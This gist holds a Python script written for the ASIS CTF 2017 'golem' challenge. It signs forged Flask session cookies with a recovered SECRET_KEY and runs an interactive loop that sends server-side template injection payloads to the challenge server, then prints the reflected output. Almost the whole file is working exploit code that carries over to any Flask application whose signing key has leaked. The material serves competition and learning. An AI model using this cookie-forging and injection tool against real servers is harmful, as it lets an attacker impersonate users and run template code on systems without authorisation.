@H4rryp0tt3r
Created September 10, 2017 17:01
A script to generate Flask sessions and exploit a server-side template injection — ASIS CTF 2017
import requests
from itsdangerous import base64_decode
from flask.sessions import SecureCookieSessionInterface
import HTMLParser
# Flask SECRET_KEY recovered from the challenge target. Flask session cookies
# are signed, not encrypted, so whoever holds this value can produce cookies
# the server accepts as authentic; keeping SECRET_KEY private (and rotating it
# once exposed) is the only defence the cookie format offers.
obtained_secret = "7h15_5h0uld_b3_r34lly_53cur3d"
class FlaskMockApp(object):
    """Minimal stand-in for a Flask application.

    ``SecureCookieSessionInterface.get_signing_serializer`` is handed an app
    object; this class carries just a ``secret_key`` attribute so no real
    Flask app has to be created. Presumably that is the only attribute the
    serializer needs for this Flask version — confirm if Flask is upgraded.
    """

    def __init__(self, secret_key):
        # Stored under the exact attribute name the serializer looks up.
        setattr(self, "secret_key", secret_key)
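def session_cookie_encoder(secret_key, session_cookie_structure):
    """Serialize and sign ``session_cookie_structure`` as a Flask session cookie.

    Args:
        secret_key: The Flask ``SECRET_KEY`` the target signs its sessions with.
        session_cookie_structure: Dict that becomes the session contents.

    Returns:
        The signed cookie string, or a string prefixed with
        ``"[Encoding error]"`` describing why signing failed. Callers must
        check for that prefix before using the value as a cookie.
    """
    try:
        app = FlaskMockApp(secret_key)
        serializer = SecureCookieSessionInterface().get_signing_serializer(app)
        # Flask hands back None (no serializer) when the app's secret key is
        # empty; report that plainly instead of the opaque AttributeError that
        # ``None.dumps`` would otherwise produce below.
        if serializer is None:
            return "[Encoding error]no serializer: secret_key is empty"
        return serializer.dumps(session_cookie_structure)
    except Exception as e:
        # Broad on purpose: the contract is "always return a string", and the
        # prefix lets the caller tell a failure apart from a real cookie.
        return "[Encoding error]{}".format(e)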
# Cookie header sent with every request. The _ga/_gid entries are fixed filler
# values; only the ``session`` slot ({0}) receives the freshly signed cookie.
cookie_string_template = "_ga=GA1.2.23644687.1504890772; _gid=GA1.2.842114127.1504890772; session={0}"
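# Markers that bracket the reflected value in the challenge's response page.
_OUTPUT_START = "Hello :"
_OUTPUT_END = ", why you don't"


def _extract_output(page_text):
    """Return the text between the two markers, or None if the start marker is absent.

    The original slice chain raised IndexError on any page without the start
    marker (error page, changed layout); returning None lets the loop report
    that instead of crashing. As before, a missing end marker yields the rest
    of the page.
    """
    _, found, rest = page_text.partition(_OUTPUT_START)
    if not found:
        return None
    return rest.split(_OUTPUT_END)[0]


while True:
    try:
        payload = raw_input("Enter payload> ")
    except (EOFError, KeyboardInterrupt):
        # Ctrl-D / Ctrl-C ends the loop cleanly rather than with a traceback.
        break
    signed_cookie = session_cookie_encoder(obtained_secret, {"golem": payload})
    if signed_cookie.startswith("[Encoding error]"):
        # The encoder reports failure in-band; never send that text as a cookie.
        print(signed_cookie)
        continue
    custom_headers = {
        "Cookie": cookie_string_template.format(signed_cookie),
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0",
    }
    # timeout: without one a stalled server blocks this loop indefinitely.
    response = requests.post(
        "https://golem.asisctf.com/golem",
        data={"golem": "Hello"},
        headers=custom_headers,
        timeout=30,
    )
    required_output = _extract_output(response.text)
    if required_output is None:
        print("[No output markers in response; HTTP {}]".format(response.status_code))
        continue
    # The server HTML-escapes the reflected value; undo that for display.
    print(HTMLParser.HTMLParser().unescape(required_output))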